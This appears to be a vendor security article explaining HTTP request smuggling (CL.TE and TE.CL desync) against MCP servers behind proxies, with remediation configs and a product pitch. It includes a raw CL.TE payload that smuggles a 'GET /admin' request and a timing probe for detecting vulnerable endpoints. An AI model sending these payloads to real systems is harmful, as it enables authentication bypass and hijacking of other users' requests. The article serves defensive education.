Topic: mcp server http request smuggling security
MCP server HTTP request smuggling security — CL.TE and TE.CL desync on MCP HTTP endpoints
HTTP request smuggling exploits disagreements between a front-end proxy and a back-end server about where one HTTP request ends and the next begins. On MCP servers deployed behind Nginx, Caddy, or AWS ALB, a single malformed request can prepend attacker-controlled content to a subsequent victim's request — bypassing authentication, poisoning shared caches, or hijacking another user's tool invocation. The attack is invisible in application logs.
How HTTP/1.1 body framing creates the desync opportunity
HTTP/1.1 offers two ways to specify a request body's length: the Content-Length header (an exact byte count) and the Transfer-Encoding: chunked header (variable-length chunks with a terminating zero-length chunk). RFC 7230 says that if both headers are present in a request, Transfer-Encoding takes precedence and Content-Length must be ignored.
The problem is that not every component in a proxy chain implements this rule consistently. Some front-end proxies prioritize Content-Length; some back-end servers prioritize Transfer-Encoding; some strip one header before forwarding. When the front-end and back-end disagree about how long a request body is, the back-end interprets leftover bytes from the first request as the beginning of the next request — hence "smuggling."
CL.TE desync — front-end uses Content-Length, back-end uses Transfer-Encoding
In CL.TE smuggling, the front-end proxy reads the Content-Length and forwards exactly that many bytes as the first request. The back-end reads the Transfer-Encoding: chunked body, consuming the chunk data and stopping at the zero terminator. Any bytes after the zero terminator are buffered as the start of the next request.
An attacker sends a request like:
POST /mcp/tools HTTP/1.1
Host: api.example.com
Content-Length: 49
Transfer-Encoding: chunked
e
{"tool":"list"}
0
GET /admin HTTP/1.1
X-
The front-end reads 49 bytes (the chunk data through the zero terminator) and forwards the full request. The back-end reads the chunked body ({"tool":"list"}) and then sees GET /admin HTTP/1.1\r\nX- as the start of the next incoming request. When the next legitimate user's request arrives, the back-end prepends the attacker's smuggled fragment to it, effectively issuing GET /admin HTTP/1.1\r\nX-[victim's headers] on the victim's authenticated connection.
TE.CL desync — front-end uses Transfer-Encoding, back-end uses Content-Length
In TE.CL smuggling, the front-end processes the chunked body and strips the Transfer-Encoding header before forwarding. The back-end receives a request with only Content-Length. If the declared Content-Length is smaller than the actual forwarded body, the back-end buffers the excess as the next request.
The classic TE.CL payload sends a chunk whose size indicator (in hex) is larger than the actual chunk data, causing the back-end to wait for more data that instead arrives as a subsequent request from a different connection.
Why MCP server deployments are specifically at risk
Several MCP deployment patterns amplify this vulnerability class:
- Long-lived HTTP/1.1 connections: MCP SSE (Server-Sent Events) transports use persistent HTTP/1.1 connections. Persistent connections are required for request smuggling — short-lived connections close after each request, preventing the buffered fragment from being appended to a different user's traffic.
- Multi-tenant proxy setups: MCP servers hosted behind a shared reverse proxy (Nginx fronting multiple tenant back-ends) share the proxy's connection pool. A smuggled request targeting the proxy's back-end connection can affect any tenant whose traffic shares the same keep-alive connection.
- Authentication at the proxy layer: Many MCP deployments perform authentication in the front-end proxy (via Nginx
auth_requestor an API gateway) and forward requests to an unauthenticated internal back-end. Request smuggling that bypasses the proxy delivers requests to the unauthenticated back-end directly. - Mixed HTTP/1.1 and HTTP/2 proxy chains: HTTP/2 uses binary framing and does not have the CL/TE ambiguity. But if a front-end terminates HTTP/2 from clients and re-encodes as HTTP/1.1 to the back-end — the common Nginx/Caddy configuration — the H2-to-H1 translation reintroduces the desync opportunity for any client that can influence request headers.
Detection: confirming CL.TE vulnerability in an MCP endpoint
The standard probe for CL.TE sends a timed payload with a large declared Content-Length and a chunked body that terminates early. A vulnerable back-end will hold the connection open waiting for the remaining declared bytes, causing a measurable delay compared to a clean endpoint:
POST /mcp/invoke HTTP/1.1
Host: target.example.com
Content-Type: application/json
Content-Length: 6
Transfer-Encoding: chunked
0
X
A 10-second response delay (versus instant on a clean endpoint) indicates the back-end is holding the connection for 5 more bytes to satisfy the Content-Length: 6 declared for the fragment starting with X. This confirms TE handling at the back-end and CL handling at the front-end — a CL.TE desync.
Remediation: three layers of defense
1. Reject ambiguous requests at the front-end proxy
Nginx and Caddy can be configured to reject requests that contain both Content-Length and Transfer-Encoding headers — the necessary condition for classic desync. In Nginx:
# nginx.conf — reject requests with both CL and TE headers
map $http_transfer_encoding $reject_smuggle {
default 0;
"~." 1; # any Transfer-Encoding present
}
server {
# Drop requests that also have Content-Length
if ($reject_smuggle = 1) {
set $cl_present $http_content_length;
}
location /mcp/ {
if ($cl_present != "") {
return 400 "Ambiguous framing headers rejected";
}
proxy_pass http://mcp_backend;
proxy_http_version 1.1; # keep-alive to back-end
}
}
2. Enforce HTTP/2 end-to-end where possible
HTTP/2 uses binary framing with explicit stream boundaries and does not support Transfer-Encoding: chunked. If both the client-to-proxy and proxy-to-backend legs use HTTP/2, the CL/TE desync attack surface disappears. In Caddy:
# Caddyfile — H2C (HTTP/2 cleartext) to the back-end
reverse_proxy /mcp/* localhost:3000 {
transport http {
versions h2c # force HTTP/2 cleartext to back-end
}
}
Node.js MCP servers can enable H2C with http2.createServer(). The HTTP/2 framing layer makes request boundary ambiguity structurally impossible.
3. Normalize Content-Length in the application layer
For MCP servers that cannot change proxy configuration, reject requests at the application layer if both framing headers are present:
// Express MCP server — reject ambiguous framing
app.use((req, res, next) => {
const hasTE = req.headers['transfer-encoding'];
const hasCL = req.headers['content-length'];
if (hasTE && hasCL) {
return res.status(400).json({
error: 'Ambiguous request framing: both Content-Length and Transfer-Encoding present'
});
}
next();
});
This does not prevent the smuggled prefix from reaching other back-ends sharing the same proxy connection pool, but it prevents the MCP server itself from acting on a smuggled request.
SkillAudit checks for request smuggling risk factors
SkillAudit's HTTP endpoint analysis checks for deployment patterns that create request smuggling risk: HTTP/1.1 keep-alive to a back-end behind a documented front-end proxy, absence of ambiguous-header rejection middleware, and SSE transports that hold long-lived connections. An A-grade MCP server either enforces HTTP/2 end-to-end, runs a single-hop deployment with no proxy chain, or includes explicit ambiguous-header rejection at both proxy and application layers. See the MCP server security checklist for the full deployment posture gate.
Check your MCP server's HTTP transport security
SkillAudit checks for proxy desync risk factors, SSE session handling, and HTTP/2 upgrade configuration in 60 seconds.
Run a free audit